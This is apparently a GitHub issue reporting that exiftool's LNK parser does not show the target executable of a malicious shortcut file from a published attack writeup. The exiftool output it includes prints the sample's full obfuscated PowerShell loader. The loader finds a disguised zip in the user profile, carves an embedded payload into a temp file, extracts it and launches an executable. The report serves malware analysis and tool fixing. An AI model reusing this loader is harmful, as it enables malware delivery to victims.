LNK parsing failing to pick out the target executable #362
Description
Somebody did a writeup about an attack using LNK files and I checked if exiftool would parse it properly. While it's picking out the Command Line Arguments field fine, it's not displaying the actual target EXE (which should be C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe)
ExifTool Version Number : 13.40
File Name : 911cccd238fbfdb4babafc8d2582e80dcfa76469fa1ee27bbc5f4324d5fca539
Directory : .
File Size : 2.6 kB
File Modification Date/Time : 1980:01:10 00:00:00-05:00
File Access Date/Time : 2025:11:03 13:33:33-05:00
File Inode Change Date/Time : 2025:11:03 13:41:13-05:00
File Permissions : -rw-r--r--
File Type : LNK
File Type Extension : lnk
MIME Type : application/octet-stream
Flags : Description, CommandArgs, IconFile, Unicode, ExpString, PreferEnvPath, KeepLocalIDList
File Attributes : (none)
Target File Size : 1174780
Icon Index : (none)
Run Window : Show Minimized No Activate
Hot Key : (none)
Description : pdf
Command Line Arguments : -w 1 -c " ;; ;$uojsbmkvp = (get-childitem -Pa $Env:USERPROFILE -Re -Inc *'Agenda_Meeting 26 Sep Brussels'.zip).fullname; ;;$ophcrygyu=[System.IO.File]::ReadAllBytes($uojsbmkvp);$xkasluyk=721; ;$lrbnaoxkomoi=[char]87+'r'+[char]105+'te'+[char]65+'l'+[char]108+'b'+[char]121+'tes'; ;echo $xkasluyk; ; ;echo $xkasluyk;;[System.IO.File]::$lrbnaoxkomoi($Env:temp+'\\rjnlzlkfe.ta', $ophcrygyu[$xkasluyk..($xkasluyk+1204224-1)]); ;;;echo $xkasluyk;;;;echo $xkasluyk;; TaR -xvf $Env:TEMP\rjnlzlkfe.ta -C $Env:Temp; Start-Process $Env:temp\cnmpaui.exe;"
Icon File Name : .\WindowssSystem326Shell32.pdf
I reported a similar issue in the past with exiftool and I have your email address for receiving such samples if you like. Just let me know...